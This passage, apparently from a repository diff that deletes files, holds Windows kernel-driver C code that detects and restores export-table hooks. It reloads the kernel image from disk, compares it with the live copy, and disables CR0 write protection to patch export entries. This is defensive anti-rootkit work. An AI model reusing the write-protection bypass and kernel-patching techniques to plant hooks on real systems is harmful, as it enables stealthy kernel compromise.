BOOLEAN IsFunctionInExportTable(ULONG ulModuleBase,ULONG ulFunctionAddress)
{
PIMAGE_DOS_HEADER pDosHeader;
PIMAGE_NT_HEADERS NtDllHeader;
IMAGE_OPTIONAL_HEADER opthdr;
DWORD* arrayOfFunctionAddresses;
DWORD* arrayOfFunctionNames;
WORD* arrayOfFunctionOrdinals;
DWORD functionOrdinal;
DWORD Base, x, functionAddress,ulOldAddress;
IMAGE_EXPORT_DIRECTORY *pExportTable;
char *functionName;
__try
{
pDosHeader=(PIMAGE_DOS_HEADER)ulModuleBase;
if (pDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return FALSE;
}
NtDllHeader=(PIMAGE_NT_HEADERS)(ULONG)((ULONG)pDosHeader+pDosHeader->e_lfanew);
if (NtDllHeader->Signature!=IMAGE_NT_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return FALSE;
}
opthdr = NtDllHeader->OptionalHeader;
pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*)ulModuleBase + opthdr.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress); //得到导出表
arrayOfFunctionAddresses = (DWORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfFunctions); //地址表
arrayOfFunctionNames = (DWORD*)((BYTE*)ulModuleBase + pExportTable->AddressOfNames); //函数名表
arrayOfFunctionOrdinals = (WORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfNameOrdinals);
Base = pExportTable->Base;
for(x = 0; x < pExportTable->NumberOfFunctions; x++) //在整个导出表里扫描
{
//functionName = (char*)((BYTE*)ulModuleBase + arrayOfFunctionNames[x]);
functionOrdinal = arrayOfFunctionOrdinals[x] + Base - 1;
functionAddress = (DWORD)((BYTE*)ulModuleBase + arrayOfFunctionAddresses[functionOrdinal]);
//KdPrint(("%08x:%s\r\n",functionAddress,functionName));
//ulOldAddress = GetSystemRoutineAddress(0,functionName);
ulOldAddress = functionAddress - ulModuleBase + SystemKernelModuleBase;
if (ulFunctionAddress == ulOldAddress)
{
//是导出函数,退出
return TRUE;
}
}
}__except(EXCEPTION_EXECUTE_HANDLER){
}
return FALSE;
}
BOOLEAN ReSetEatHook(CHAR *lpszFunction,ULONG ulReloadKernelModule,ULONG ulKernelModule)
{
ULONG ulModuleBase;
PIMAGE_DOS_HEADER pDosHeader;
PIMAGE_NT_HEADERS NtDllHeader;
IMAGE_OPTIONAL_HEADER opthdr;
DWORD* arrayOfFunctionAddresses;
DWORD* arrayOfFunctionNames;
WORD* arrayOfFunctionOrdinals;
DWORD functionOrdinal;
DWORD Base,x,functionAddress;
IMAGE_EXPORT_DIRECTORY *pExportTable;
char *functionName = NULL;
BOOL bIsEatHooked = FALSE;
int position;
ULONG ulFunctionOrdinal;
//恢复的时候 用reload的ImageModuleBase
ulModuleBase = ulReloadKernelModule;
pDosHeader = (PIMAGE_DOS_HEADER)ulModuleBase;
if (pDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
NtDllHeader=(PIMAGE_NT_HEADERS)(ULONG)((ULONG)pDosHeader+pDosHeader->e_lfanew);
if (NtDllHeader->Signature!=IMAGE_NT_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
opthdr = NtDllHeader->OptionalHeader;
pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*)ulModuleBase + opthdr.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress); //得到导出表
arrayOfFunctionAddresses = (DWORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfFunctions); //地址表
arrayOfFunctionNames = (DWORD*)((BYTE*)ulModuleBase + pExportTable->AddressOfNames); //函数名表
arrayOfFunctionOrdinals = (WORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfNameOrdinals);
Base = pExportTable->Base;
for(x = 0; x < pExportTable->NumberOfFunctions; x++) //在整个导出表里扫描
{
functionName = (char*)((BYTE*)ulModuleBase + arrayOfFunctionNames[x]);
ulFunctionOrdinal = arrayOfFunctionOrdinals[x] + Base - 1;
ulFunctionOrdinal = arrayOfFunctionAddresses[ulFunctionOrdinal];
functionAddress = (DWORD)((BYTE*)ulModuleBase + ulFunctionOrdinal);
if (_stricmp(lpszFunction,functionName) == 0)
{
KdPrint(("reload ulFunctionOrdinal:%08x:%s",ulFunctionOrdinal,functionName));
//开始恢复
ulModuleBase = ulKernelModule;
pDosHeader = (PIMAGE_DOS_HEADER)ulModuleBase;
if (pDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
NtDllHeader=(PIMAGE_NT_HEADERS)(ULONG)((ULONG)pDosHeader+pDosHeader->e_lfanew);
if (NtDllHeader->Signature!=IMAGE_NT_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
opthdr = NtDllHeader->OptionalHeader;
pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*)ulModuleBase + opthdr.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress); //得到导出表
arrayOfFunctionAddresses = (DWORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfFunctions); //地址表
arrayOfFunctionNames = (DWORD*)((BYTE*)ulModuleBase + pExportTable->AddressOfNames); //函数名表
arrayOfFunctionOrdinals = (WORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfNameOrdinals);
Base = pExportTable->Base;
_asm
{
CLI
MOV EAX, CR0
AND EAX, NOT 10000H
MOV CR0, EAX
}
arrayOfFunctionAddresses[arrayOfFunctionOrdinals[x] + Base - 1] = ulFunctionOrdinal;
_asm
{
MOV EAX, CR0
OR EAX, 10000H
MOV CR0, EAX
STI
}
break;
}
}
return TRUE;
}
ULONG GetEatHook(ULONG ulOldAddress,int x,ULONG ulSystemKernelModuleBase,ULONG ulSystemKernelModuleSize)
{
ULONG ulModuleBase;
PIMAGE_DOS_HEADER pDosHeader;
PIMAGE_NT_HEADERS NtDllHeader;
IMAGE_OPTIONAL_HEADER opthdr;
DWORD* arrayOfFunctionAddresses;
DWORD* arrayOfFunctionNames;
WORD* arrayOfFunctionOrdinals;
DWORD functionOrdinal;
DWORD Base,functionAddress;
IMAGE_EXPORT_DIRECTORY *pExportTable;
char *functionName = NULL;
BOOL bIsEatHooked = FALSE;
ULONG position = 0;
ULONG ulFunctionOrdinal;
ulModuleBase = ulSystemKernelModuleBase;
pDosHeader = (PIMAGE_DOS_HEADER)ulModuleBase;
if (pDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
NtDllHeader=(PIMAGE_NT_HEADERS)(ULONG)((ULONG)pDosHeader+pDosHeader->e_lfanew);
if (NtDllHeader->Signature!=IMAGE_NT_SIGNATURE)
{
KdPrint(("failed to find NtHeader\r\n"));
return 0;
}
opthdr = NtDllHeader->OptionalHeader;
pExportTable =(IMAGE_EXPORT_DIRECTORY*)((BYTE*)ulModuleBase + opthdr.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT]. VirtualAddress); //得到导出表
arrayOfFunctionAddresses = (DWORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfFunctions); //地址表
arrayOfFunctionNames = (DWORD*)((BYTE*)ulModuleBase + pExportTable->AddressOfNames); //函数名表
arrayOfFunctionOrdinals = (WORD*)( (BYTE*)ulModuleBase + pExportTable->AddressOfNameOrdinals);
Base = pExportTable->Base;
functionName = (char*)((BYTE*)ulModuleBase + arrayOfFunctionNames[x]);
ulFunctionOrdinal = arrayOfFunctionOrdinals[x] + Base - 1;
functionAddress = (DWORD)((BYTE*)ulModuleBase + arrayOfFunctionAddresses[ulFunctionOrdinal]);
if (*functionName == 'Z' &&
*(functionName+1) == 'w')
{
position = *((WORD*)(functionAddress + 1)); //得到服务号
if (position > 0 &&
position <= OriginalServiceDescriptorTable->TableSize)
{
//得到原始地址
functionAddress = OriginalServiceDescriptorTable->ServiceTable[position] - (ULONG)ImageModuleBase + SystemKernelModuleBase;
}
}
if (ulOldAddress != functionAddress)
{
KdPrint(("EAT HOOK %08x:%s\r\n",functionAddress,functionName));
return functionAddress;
}
return 0;
}

11
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/KernelHookCheck.h
View File

@ -1,11 +0,0 @@
#include "DriverEntry.h"
BOOLEAN KernelHookCheck(PINLINEHOOKINFO InlineHookInfo);
VOID FillInlineHookInfo(PUCHAR ulTemp,PINLINEHOOKINFO InlineHookInfo,CHAR* szFunctionName,ULONG ulOldAddress,ULONG HookType);
VOID CheckFuncByOpcode(PVOID ulReloadAddress,PINLINEHOOKINFO InlineHookInfo,CHAR* szFunctionName,PVOID ulOldAddress);
ULONG GetNextFunctionAddress(ULONG ulNtDllModuleBase,ULONG ulOldAddress,char *functionName,PINLINEHOOKINFO InlineHookInfo);
BOOLEAN ReSetEatHook(CHAR *lpszFunction,ULONG ulReloadKernelModule,ULONG ulKernelModule);
ULONG GetEatHook(ULONG ulOldAddress,int x,ULONG ulSystemKernelModuleBase,ULONG ulSystemKernelModuleSize);
BOOLEAN IsFunctionInExportTable(ULONG ulModuleBase,ULONG ulFunctionAddress);

820
Win32/Proof of Concepts/CheckKernelEATHook/CheckKernelHookDrv/CheckKernelHook/KernelReload.c
View File

@ -1,820 +0,0 @@
#include "KernelReload.h"
#include "FileSystem.h"
#include "FixRelocation.h"
/*ZwQuerySystemInformation大法 枚举模块信息 获得第一模块 Ntos..*/
BOOLEAN GetSystemKernelModuleInfo(WCHAR **SystemKernelModulePath,PDWORD SystemKernelModuleBase,PDWORD SystemKernelModuleSize)
{
NTSTATUS status;
ULONG ulSize,i;
PMODULES pModuleList;
char *lpszKernelName=NULL;
ANSI_STRING AnsiKernelModule;
UNICODE_STRING UnicodeKernelModule;
BOOLEAN bRet=TRUE;
__try
{
status=ZwQuerySystemInformation(
SystemModuleInformation,
NULL,
0,
&ulSize
);
if (status != STATUS_INFO_LENGTH_MISMATCH)
{
return FALSE;
}
pModuleList=(PMODULES)ExAllocatePool(NonPagedPool,ulSize);
if (pModuleList)
{
status=ZwQuerySystemInformation(
SystemModuleInformation,
pModuleList,
ulSize,
&ulSize
);
if (!NT_SUCCESS(status))
{
bRet = FALSE;
}
}
if (!bRet)
{
if (pModuleList)
ExFreePool(pModuleList);
return FALSE;
}
*SystemKernelModulePath=ExAllocatePool(NonPagedPool,260*2);
if (*SystemKernelModulePath==NULL)
{
*SystemKernelModuleBase=0;
*SystemKernelModuleSize=0;
return FALSE;
}
lpszKernelName = pModuleList->smi[0].ModuleNameOffset+pModuleList->smi[0].ImageName; //第一模块名称
RtlInitAnsiString(&AnsiKernelModule,lpszKernelName);
RtlAnsiStringToUnicodeString(&UnicodeKernelModule,&AnsiKernelModule,TRUE);
RtlZeroMemory(*SystemKernelModulePath,260*2);
wcscat(*SystemKernelModulePath,L"\\SystemRoot\\system32\\");
memcpy(
*SystemKernelModulePath+wcslen(L"\\SystemRoot\\system32\\"), //第一模块路径
UnicodeKernelModule.Buffer,
UnicodeKernelModule.Length
);
*SystemKernelModuleBase=(DWORD)pModuleList->smi[0].Base; //获得第一模块地址
*SystemKernelModuleSize=(DWORD)pModuleList->smi[0].Size; //获得第一模块大小
ExFreePool(pModuleList);
RtlFreeUnicodeString(&UnicodeKernelModule);
}__except(EXCEPTION_EXECUTE_HANDLER){
}
return TRUE;
}
/*获得文件对象中DeviceObject和RealDevice*/
BOOLEAN IoGetFileSystemVpbInfo(IN PFILE_OBJECT FileObject,PDEVICE_OBJECT *DeviceObject,PDEVICE_OBJECT *RealDevice)
{
//PDEVICE_OBJECT deviceObject;
// If the file object has a mounted Vpb, use its DeviceObject.
if(FileObject->Vpb != NULL && FileObject->Vpb->DeviceObject != NULL)
{
*DeviceObject = FileObject->Vpb->DeviceObject;
*RealDevice= FileObject->Vpb->RealDevice;
// Otherwise, if the real device has a VPB that indicates that it is mounted,
// then use the file system device object associated with the VPB.
}
else if
(
!(FileObject->Flags & FO_DIRECT_DEVICE_OPEN)
&&
FileObject->DeviceObject->Vpb != NULL
&&
FileObject->DeviceObject->Vpb->DeviceObject != NULL
)
{
*DeviceObject = FileObject->DeviceObject->Vpb->DeviceObject;
*RealDevice = FileObject->DeviceObject->Vpb->RealDevice;
// Otherwise, just return the real device object.
}
else
{
*DeviceObject = FileObject->DeviceObject;
*RealDevice=NULL;
}
if (*RealDevice==NULL||*DeviceObject==NULL)
{
return FALSE;
}
// Simply return the resultant file object.
return TRUE;
}
//获得FileObject中的RealDevice和DeviceObject
BOOLEAN GetDeviceObjectFromFileFullName(WCHAR *FileFullName,PDEVICE_OBJECT *RealDevice, PDEVICE_OBJECT *DeviceObject)
{
WCHAR wRootName[32]={0};
UNICODE_STRING RootName;
OBJECT_ATTRIBUTES ObjectAttributes={0};
NTSTATUS status;
HANDLE hFile;
IO_STATUS_BLOCK IoStatus;
PFILE_OBJECT FileObject;
if (FileFullName[0]==0x005C)
{//in \Windows\system32\ntkrnlpa.exe
wcscpy(wRootName,L"\\SystemRoot");
}
else
{
wcscpy(wRootName,L"\\DosDevices\\*:\\");
wRootName[12]=FileFullName[0];
}
RtlInitUnicodeString(&RootName,wRootName);
InitializeObjectAttributes(&ObjectAttributes, &RootName,
OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE, NULL, NULL);
//RootName.Buffer = "\SystemRoot"
status = IoCreateFile(
&hFile,
SYNCHRONIZE,
&ObjectAttributes,
&IoStatus,
0,
FILE_ATTRIBUTE_NORMAL,
FILE_SHARE_READ|FILE_SHARE_WRITE,
FILE_OPEN,
FILE_DIRECTORY_FILE|FILE_SYNCHRONOUS_IO_NONALERT,
NULL,
0,
0,
NULL,
IO_NO_PARAMETER_CHECKING);
if (!NT_SUCCESS(status))
{
return FALSE;
}
status=ObReferenceObjectByHandle(hFile,1,*IoFileObjectType,KernelMode,&FileObject,NULL);
if (!NT_SUCCESS(status))
{
ZwClose(hFile);
return FALSE;
}
if(!IoGetFileSystemVpbInfo(FileObject,DeviceObject,RealDevice)) //获得FileObject中的deviceObject和RealDevice
{
ObfDereferenceObject(FileObject);
ZwClose(hFile);
return FALSE;
}
ObfDereferenceObject(FileObject);
ZwClose(hFile);
return TRUE;
}
/*获得系统目录*/
BOOLEAN GetWindowsRootName(WCHAR *WindowsRootName)
{
UNICODE_STRING RootName,ObjectName;
OBJECT_ATTRIBUTES ObjectAttributes;
HANDLE hLink;
NTSTATUS status;
WCHAR *SystemRootName=(WCHAR*)0x7FFE0030;
WCHAR *ObjectNameBuffer=(WCHAR*)ExAllocatePool(NonPagedPool,260*2);
if (ObjectNameBuffer==NULL)
{
return FALSE;
}
RtlZeroMemory(ObjectNameBuffer,260*2);
RtlInitUnicodeString(&RootName,L"\\SystemRoot");
InitializeObjectAttributes(&ObjectAttributes,&RootName,OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE, NULL, NULL);
status=ZwOpenSymbolicLinkObject(&hLink,1,&ObjectAttributes);
if (NT_SUCCESS(status))
{
ObjectName.Buffer=ObjectNameBuffer;
ObjectName.Length=0;
ObjectName.MaximumLength=260*2;
status=ZwQuerySymbolicLinkObject(hLink,&ObjectName,NULL);
//ObjectNameBuffer \Device\Harddisk0\Partition1\Windows
if (NT_SUCCESS(status))
{
int ObjectNameLength=ObjectName.Length/2;
int Index;
for (Index=ObjectNameLength-1;Index>0;Index--)
{
if (ObjectNameBuffer[Index]==0x005C)
{
if (!MmIsAddressValid(&WindowsRootName[ObjectNameLength-Index]))
{
break;
}
//\Windows WindowsRootName
RtlCopyMemory(WindowsRootName,&ObjectNameBuffer[Index],(ObjectNameLength-Index)*2);
ExFreePool(ObjectNameBuffer);
return TRUE;
}
}
}
}
ExFreePool(ObjectNameBuffer);
if (!MmIsAddressValid(SystemRootName))
{
return FALSE;
}
if (SystemRootName[1]!=0x003A||SystemRootName[2]!=0x005C)
{
return FALSE;
}
wcscpy(WindowsRootName,&SystemRootName[2]);
return TRUE;
}
/*
FileObject->IrpList
*/
//\SystemRoot\system32\ntkrnlpa.exe
NTSTATUS KernelOpenFile(wchar_t *FileFullName,
PHANDLE FileHandle,
ACCESS_MASK DesiredAccess,
ULONG FileAttributes,
ULONG ShareAccess,
ULONG CreateDisposition,
ULONG CreateOptions)
{
WCHAR SystemRootName[32]=L"\\SystemRoot";
WCHAR *FileNodeName=NULL;
UNICODE_STRING FilePath;
PDEVICE_OBJECT RealDevice,DeviceObject;
NTSTATUS status=STATUS_UNSUCCESSFUL;
PFILE_OBJECT FileObject;
FileNodeName=ExAllocatePool(NonPagedPool,260*2);
if (FileNodeName==NULL)
{
return status;
}
RtlZeroMemory(FileNodeName,260*2);
if (_wcsnicmp(FileFullName,SystemRootName,wcslen(SystemRootName))==0) //忘记相等返回什么了 不过应该是不完整路径 这里面是修复
{
//in
int Len;
if(!GetWindowsRootName(FileNodeName)) // \Windows
{
ExFreePool(FileNodeName);
return status;
}
Len=wcslen(SystemRootName);
wcscat(FileNodeName,&FileFullName[Len]);
//FileNodeName == \Windows\system32\ntkrnlpa.exe
//FileFullName == \SystemRoot\system32\ntkrnlpa.exe
}
else
{
if (FileFullName[1]!=0x003A||FileFullName[2]!=0x005C)
{
return status;
}
wcscpy(FileNodeName,&FileFullName[2]);
}
if(!GetDeviceObjectFromFileFullName(FileFullName,&RealDevice,&DeviceObject)) //获得FileObject中的DeviceObject和RealDevice
{
ExFreePool(FileNodeName);
return status;
}
//FileNodeName == \Windows\system32\ntkrnlpa.exe
RtlInitUnicodeString(&FilePath,FileNodeName);
status=IrpCreateFile(&FilePath,DesiredAccess,FileAttributes,ShareAccess,CreateDisposition,CreateOptions,DeviceObject,RealDevice,&FileObject);
//创建文件对象 挂入FileObject->IrpList中
if (!NT_SUCCESS(status))
{
ExFreePool(FileNodeName);
return status;
}
//根据文件对象,获得文件句柄
status=ObOpenObjectByPointer(
FileObject,
OBJ_KERNEL_HANDLE, //verifier下测试要指定OBJ_KERNEL_HANDLE
0,
DesiredAccess|0x100000,
*IoFileObjectType,
0,
FileHandle);
ObfDereferenceObject(FileObject);
return status;
}
//查询irp信息返回filesize
NTSTATUS KernelGetFileSize(HANDLE hFile, PLARGE_INTEGER FileSize)
{
NTSTATUS status;
PFILE_OBJECT FileObject;
PDEVICE_OBJECT DeviceObject,RealDevice;
FILE_STANDARD_INFORMATION FileInformation;
status=ObReferenceObjectByHandle(hFile, 0, *IoFileObjectType, KernelMode, &FileObject, 0);
if (!NT_SUCCESS(status))
{
return status;
}
if(!IoGetFileSystemVpbInfo(FileObject,&DeviceObject,&RealDevice))
{
ObDereferenceObject(FileObject);
return STATUS_UNSUCCESSFUL;
}
//查询irp堆栈信息传入FileObject
status=IrpQueryInformationFile(FileObject,DeviceObject,&FileInformation,sizeof(FILE_STANDARD_INFORMATION),FileStandardInformation);
if (!NT_SUCCESS(status))
{
ObDereferenceObject(FileObject);
return status;
}
FileSize->HighPart=FileInformation.EndOfFile.HighPart;
FileSize->LowPart=FileInformation.EndOfFile.LowPart;
ObDereferenceObject(FileObject);
return status;
}
/*
*/
NTSTATUS KernelReadFile(HANDLE hFile, PLARGE_INTEGER ByteOffset, ULONG Length, PVOID FileBuffer, PIO_STATUS_BLOCK IoStatusBlock)
{
NTSTATUS status;
PFILE_OBJECT FileObject;
PDEVICE_OBJECT DeviceObject,RealDevice;
FILE_STANDARD_INFORMATION FileInformation;
status=ObReferenceObjectByHandle(hFile, 0, *IoFileObjectType, KernelMode, &FileObject, 0);
if (!NT_SUCCESS(status))
{
return status;
}
if(!IoGetFileSystemVpbInfo(FileObject,&DeviceObject,&RealDevice))
{
ObDereferenceObject(FileObject);
return STATUS_UNSUCCESSFUL;
}
status=IrpReadFile(FileObject,DeviceObject,IoStatusBlock,FileBuffer,Length,ByteOffset); //Irp请求将文件读入缓冲区中
ObDereferenceObject(FileObject);
return status;
}
/*
FileBuffer中的偏移 VirtualAglin
filebuffer ImageModuleBase为系统中的模块地址
*/
BOOLEAN ImageFile(BYTE *FileBuffer,BYTE **ImageModuleBase)
{
PIMAGE_DOS_HEADER ImageDosHeader;
PIMAGE_NT_HEADERS ImageNtHeaders;
PIMAGE_SECTION_HEADER ImageSectionHeader;
DWORD FileAlignment,SectionAlignment,NumberOfSections,SizeOfImage,SizeOfHeaders;
DWORD Index;
BYTE *ImageBase;
DWORD SizeOfNtHeaders;
ImageDosHeader=(PIMAGE_DOS_HEADER)FileBuffer;
if (ImageDosHeader->e_magic!=IMAGE_DOS_SIGNATURE)
{
return FALSE;
}
ImageNtHeaders=(PIMAGE_NT_HEADERS)(FileBuffer+ImageDosHeader->e_lfanew);
if (ImageNtHeaders->Signature!=IMAGE_NT_SIGNATURE)
{
return FALSE;
}
FileAlignment=ImageNtHeaders->OptionalHeader.FileAlignment;//0x200
SectionAlignment=ImageNtHeaders->OptionalHeader.SectionAlignment;//0x1000
NumberOfSections=ImageNtHeaders->FileHeader.NumberOfSections;//0x16
SizeOfImage=ImageNtHeaders->OptionalHeader.SizeOfImage;//0x412000
SizeOfHeaders=ImageNtHeaders->OptionalHeader.SizeOfHeaders;//0x800
SizeOfImage=AlignSize(SizeOfImage,SectionAlignment);//0x412000
ImageBase=ExAllocatePool(NonPagedPool,SizeOfImage);
if (ImageBase==NULL)
{
return FALSE;
}
RtlZeroMemory(ImageBase,SizeOfImage);
//0xf8
SizeOfNtHeaders=sizeof(ImageNtHeaders->FileHeader) + sizeof(ImageNtHeaders->Signature)+ImageNtHeaders->FileHeader.SizeOfOptionalHeader;
ImageSectionHeader=(PIMAGE_SECTION_HEADER)((DWORD)ImageNtHeaders+SizeOfNtHeaders);
for (Index=0;Index<NumberOfSections;Index++)
{
ImageSectionHeader[Index].SizeOfRawData=AlignSize(ImageSectionHeader[Index].SizeOfRawData,FileAlignment);
ImageSectionHeader[Index].Misc.VirtualSize=AlignSize(ImageSectionHeader[Index].Misc.VirtualSize,SectionAlignment);
}
if (ImageSectionHeader[NumberOfSections-1].VirtualAddress+ImageSectionHeader[NumberOfSections-1].SizeOfRawData>SizeOfImage)
{//no in
ImageSectionHeader[NumberOfSections-1].SizeOfRawData = SizeOfImage-ImageSectionHeader[NumberOfSections-1].VirtualAddress;
}
RtlCopyMemory(ImageBase,FileBuffer,SizeOfHeaders);
for (Index=0;Index<NumberOfSections;Index++)
{
DWORD FileOffset=ImageSectionHeader[Index].PointerToRawData;
DWORD Length=ImageSectionHeader[Index].SizeOfRawData;
DWORD ImageOffset=ImageSectionHeader[Index].VirtualAddress;
RtlCopyMemory(&ImageBase[ImageOffset],&FileBuffer[FileOffset],Length);
}
*ImageModuleBase=ImageBase;
return TRUE;
}
ULONG AlignSize(ULONG nSize, ULONG nAlign)
{
return ((nSize + nAlign - 1) / nAlign * nAlign);
}
/*
DriverObject->DriverSection
*/
PVOID GetKernelModuleBase(PDRIVER_OBJECT DriverObject,char *KernelModuleName)
{
PLDR_DATA_TABLE_ENTRY DriverSection,LdrEntry;
ANSI_STRING AnsiKernelModuleName;
UNICODE_STRING UniKernelModuleName;
UNICODE_STRING ModuleName;
WCHAR *Buffer;
int Lentgh,Index;
RtlInitAnsiString(&AnsiKernelModuleName,KernelModuleName);
RtlAnsiStringToUnicodeString(&UniKernelModuleName,&AnsiKernelModuleName,TRUE);
Buffer=ExAllocatePool(NonPagedPool,260*2);
if (Buffer==NULL)
{
return NULL;
}
RtlZeroMemory(Buffer,206*2);
DriverSection=DriverObject->DriverSection;
LdrEntry=(PLDR_DATA_TABLE_ENTRY)DriverSection->InLoadOrderLinks.Flink;
while (LdrEntry&&DriverSection!=LdrEntry)
{
//(DWORD)LdrEntry->DllBase>=*(DWORD*)MmSystemRangeStart&&
if (LdrEntry->FullDllName.Length>0&&
LdrEntry->FullDllName.Buffer!=NULL)
{
if (MmIsAddressValid(&LdrEntry->FullDllName.Buffer[LdrEntry->FullDllName.Length/2-1]))
{
Lentgh=LdrEntry->FullDllName.Length/2;
for (Index=Lentgh-1;Index>0;Index--)
{
if (LdrEntry->FullDllName.Buffer[Index]==0x005C)
{
break;
}
}
if (LdrEntry->FullDllName.Buffer[Index]==0x005C)
{
RtlCopyMemory(Buffer,&(LdrEntry->FullDllName.Buffer[Index+1]),(Lentgh-Index-1)*2);
ModuleName.Buffer=Buffer;
ModuleName.Length=(Lentgh-Index-1)*2;
ModuleName.MaximumLength=260*2;
}
else
{
RtlCopyMemory(Buffer,LdrEntry->FullDllName.Buffer,Lentgh*2);
ModuleName.Buffer=Buffer;
ModuleName.Length=Lentgh*2;
ModuleName.MaximumLength=260*2;
}
if (RtlEqualUnicodeString(&ModuleName,&UniKernelModuleName,TRUE))
{
ExFreePool(Buffer);
return LdrEntry->DllBase;
}
}
}
LdrEntry=(PLDR_DATA_TABLE_ENTRY)LdrEntry->InLoadOrderLinks.Flink;
}
ExFreePool(Buffer);
return NULL;
}
/*
*/
PVOID
MiFindExportedRoutine (
IN PVOID DllBase,
BOOLEAN ByName,
IN char *RoutineName,
DWORD Ordinal
)
{
USHORT OrdinalNumber;
PULONG NameTableBase;
PUSHORT NameOrdinalTableBase;
PULONG AddressTableBase;
PULONG Addr;
LONG High;
LONG Low;
LONG Middle;
LONG Result;
ULONG ExportSize;
PVOID FunctionAddress;
PIMAGE_EXPORT_DIRECTORY ExportDirectory;
PAGED_CODE();
//获得导出表
ExportDirectory = (PIMAGE_EXPORT_DIRECTORY) RtlImageDirectoryEntryToData (
DllBase,
TRUE,
IMAGE_DIRECTORY_ENTRY_EXPORT,
&ExportSize);
if (ExportDirectory == NULL) {
return NULL;
}
NameTableBase = (PULONG)((PCHAR)DllBase + (ULONG)ExportDirectory->AddressOfNames);
NameOrdinalTableBase = (PUSHORT)((PCHAR)DllBase + (ULONG)ExportDirectory->AddressOfNameOrdinals);
AddressTableBase=(PULONG)((PCHAR)DllBase + (ULONG)ExportDirectory->AddressOfFunctions);
if (!ByName)
{
return (PVOID)AddressTableBase[Ordinal];
}
Low = 0;
Middle = 0;
High = ExportDirectory->NumberOfNames - 1;
while (High >= Low) {
Middle = (Low + High) >> 1;
Result = strcmp (RoutineName,
(PCHAR)DllBase + NameTableBase[Middle]);
if (Result < 0) {
High = Middle - 1;
}
else if (Result > 0) {
Low = Middle + 1;
}
else {
break;
}
}
if (High < Low) {
return NULL;
}
OrdinalNumber = NameOrdinalTableBase[Middle];
if ((ULONG)OrdinalNumber >= ExportDirectory->NumberOfFunctions) {
return NULL;
}
Addr = (PULONG)((PCHAR)DllBase + (ULONG)ExportDirectory->AddressOfFunctions);
FunctionAddress = (PVOID)((PCHAR)DllBase + Addr[OrdinalNumber]);
//
// Forwarders are not used by the kernel and HAL to each other.
//
ASSERT ((FunctionAddress <= (PVOID)ExportDirectory) ||
(FunctionAddress >= (PVOID)((PCHAR)ExportDirectory + ExportSize)));
return FunctionAddress;
}
BOOLEAN InsertOriginalFirstThunk(DWORD ImageBase,DWORD ExistImageBase,PIMAGE_THUNK_DATA FirstThunk)
{
DWORD Offset;
PIMAGE_THUNK_DATA OriginalFirstThunk;
Offset=(DWORD)FirstThunk-ImageBase;
OriginalFirstThunk=(PIMAGE_THUNK_DATA)(ExistImageBase+Offset);
while (OriginalFirstThunk->u1.Function)
{
FirstThunk->u1.Function=OriginalFirstThunk->u1.Function;
OriginalFirstThunk++;
FirstThunk++;
}
return TRUE;
}
//修复导入表
BOOLEAN FixImportTable(BYTE *ImageBase,DWORD ExistImageBase,PDRIVER_OBJECT DriverObject)
{
PIMAGE_IMPORT_DESCRIPTOR ImageImportDescriptor=NULL;
PIMAGE_THUNK_DATA ImageThunkData,FirstThunk;
PIMAGE_IMPORT_BY_NAME ImortByName;
DWORD ImportSize;
PVOID ModuleBase;
char ModuleName[260];
DWORD FunctionAddress;
//得到导入表地址
ImageImportDescriptor=(PIMAGE_IMPORT_DESCRIPTOR)RtlImageDirectoryEntryToData(ImageBase,TRUE,IMAGE_DIRECTORY_ENTRY_IMPORT,&ImportSize);
if (ImageImportDescriptor==NULL)
{
return FALSE;
}
while (ImageImportDescriptor->OriginalFirstThunk&&ImageImportDescriptor->Name)
{
strcpy(ModuleName,(char*)(ImageBase+ImageImportDescriptor->Name)); //导入信息名称
//ntoskrnl.exe(NTKRNLPA.exe、ntkrnlmp.exe、ntkrpamp.exe)
if (_stricmp(ModuleName,"ntkrnlpa.exe")==0||
_stricmp(ModuleName,"ntoskrnl.exe")==0||
_stricmp(ModuleName,"ntkrnlmp.exe")==0||
_stricmp(ModuleName,"ntkrpamp.exe")==0)
{//no in
ModuleBase=GetKernelModuleBase(DriverObject,"ntkrnlpa.exe"); //通过DriverObject->DriverSection 遍历内核模块
if (ModuleBase==NULL)
{
ModuleBase=GetKernelModuleBase(DriverObject,"ntoskrnl.exe");
if (ModuleBase==NULL)
{
ModuleBase=GetKernelModuleBase(DriverObject,"ntkrnlmp.exe");
if (ModuleBase==NULL)
{
ModuleBase=GetKernelModuleBase(DriverObject,"ntkrpamp.exe");
}
}
}
}
else
{
ModuleBase=GetKernelModuleBase(DriverObject,ModuleName);
}
if (ModuleBase==NULL)
{
FirstThunk=(PIMAGE_THUNK_DATA)(ImageBase+ImageImportDescriptor->FirstThunk);
InsertOriginalFirstThunk((DWORD)ImageBase,ExistImageBase,FirstThunk);
ImageImportDescriptor++;
continue;
}
//PSHED.dll
ImageThunkData=(PIMAGE_THUNK_DATA)(ImageBase+ImageImportDescriptor->OriginalFirstThunk);
